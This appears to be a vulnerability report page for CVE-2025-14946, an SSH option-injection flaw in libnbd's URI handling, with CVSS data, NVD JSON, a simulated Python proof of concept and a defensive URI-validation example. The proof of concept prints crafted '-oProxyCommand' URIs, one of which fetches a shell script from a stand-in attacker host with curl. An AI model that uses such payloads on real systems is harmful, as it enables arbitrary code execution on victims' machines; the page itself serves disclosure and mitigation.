Security Vulnerability Report
CVE-2025-14946 CVSS 4.8 MEDIUM

CVE-2025-14946

Published: 2025-12-19 13:16:03
Last Modified: 2026-04-15 00:35:42

Description

A flaw was found in libnbd. A malicious actor could exploit this by convincing libnbd to open a specially crafted Uniform Resource Identifier (URI). This vulnerability arises because non-standard hostnames starting with '-o' are incorrectly interpreted as arguments to the Secure Shell (SSH) process, rather than as hostnames. This could lead to arbitrary code execution with the privileges of the user running libnbd.

CVSS Details

CVSS Score: 4.8
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

libnbd < 1.24.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-14946 PoC - command injection in libnbd URI handling
# Builds a malicious URI that triggers SSH option injection

# Malicious URI example - a hostname starting with '-o' injects an SSH option
malicious_uri = "nbd://-oProxyCommand=id>/tmp/pwned localhost"

print("[*] CVE-2025-14946 PoC")
print(f"[*] Malicious URI: {malicious_uri}")
print("[*] This URI exploits the SSH option injection in libnbd")
print()


# Simulates libnbd's URI parsing and SSH command construction.
# Nothing here calls libnbd or runs ssh; it only prints what would be built.
def simulate_libnbd_uri_parsing(uri):
    """
    Simulate how libnbd parses URI and builds SSH command.
    The vulnerability is that hostnames starting with '-o' are passed
    directly to SSH as options instead of being treated as hostname.
    """
    print(f"[+] Parsing URI: {uri}")
    # Simplified parsing - in reality uses libxml2
    if uri.startswith("nbd://"):
        host_part = uri[6:].split('/')[0]
        print(f"[+] Extracted host: {host_part}")
        # VULNERABLE: No validation of host starting with '-'
        if host_part.startswith('-o'):
            print("[!] WARNING: Host starts with '-o' - will be interpreted as SSH option!")
            # Simulating SSH command construction
            ssh_cmd = ['ssh', host_part, 'nbd-server-read-only']
            print(f"[+] Constructed SSH command: {' '.join(ssh_cmd)}")
            print("[!] The '-oProxyCommand=...' will be treated as SSH option!")
            return ssh_cmd
    return None


# Run the PoC
ssh_cmd = simulate_libnbd_uri_parsing(malicious_uri)
if ssh_cmd:
    print()
    print("[*] To exploit, attacker would run:")
    print(f"[*] nbdkit -r nbd {malicious_uri}")
    print("[*] Or use libnbd API to connect to this malicious URI")
    print()
    print("[+] Example: nbd://-oProxyCommand=curl${IFS}attacker.com/shell.sh|[email protected]/")
```
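A defensive counterpart to the simulation above, added here as an example and not taken from libnbd or its fix: it validates the URI host and user before building an ssh argument vector, and places `--` before the hostname so it can never be parsed as an option (the general CWE-88 mitigation). The function names, the `nbd+ssh://` sample URIs and the `REMOTE_CMD` placeholder are assumptions.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# RFC 1123 style labels: letters, digits, inner hyphens; never a leading '-'.
_LABEL = r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
_HOSTNAME = re.compile(rf"{_LABEL}(?:\.{_LABEL})*\.?")
_USER = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.-]{0,31}")
REMOTE_CMD = "remote-nbd-command"  # placeholder, not libnbd's real remote command


def _valid_host(host: str) -> bool:
    try:
        ipaddress.ip_address(host)  # accept IPv4/IPv6 literals
        return True
    except ValueError:
        return len(host) <= 253 and _HOSTNAME.fullmatch(host) is not None


def ssh_argv_for_uri(uri: str) -> list[str]:
    """Return an ssh argv for the URI's host, or raise ValueError."""
    parts = urlsplit(uri)
    host, user = parts.hostname, parts.username
    if not host or not _valid_host(host):
        raise ValueError(f"refusing host {host!r}")
    if user is not None and not _USER.fullmatch(user):
        raise ValueError(f"refusing user {user!r}")
    argv = ["ssh"]
    if user is not None:
        argv += ["-l", user]
    if parts.port is not None:  # .port itself raises ValueError if malformed
        argv += ["-p", str(parts.port)]
    # "--" ends option parsing, so even a host that slipped past the
    # checks above could only be read as a hostname, never as "-o...".
    return argv + ["--", host, REMOTE_CMD]


def is_rejected(uri: str) -> bool:
    """True when the URI is refused before any process would be spawned."""
    try:
        ssh_argv_for_uri(uri)
        return False
    except ValueError:
        return True
```

Passing the argv as a list to `subprocess.run` (no shell) keeps each element a single argument; the host check and the `--` separator are independent layers, so either one alone stops the option injection described on this page.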

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14946", "sourceIdentifier": "[email protected]", "published": "2025-12-19T13:16:03.127", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in libnbd. A malicious actor could exploit this by convincing libnbd to open a specially crafted Uniform Resource Identifier (URI). This vulnerability arises because non-standard hostnames starting with '-o' are incorrectly interpreted as arguments to the Secure Shell (SSH) process, rather than as hostnames. This could lead to arbitrary code execution with the privileges of the user running libnbd."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.3, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-88"}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2025-14946", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2423789", "source": "[email protected]"}, {"url": "https://libguestfs.org/libnbd-release-notes-1.24.1.html#Security", "source": "[email protected]"}]}}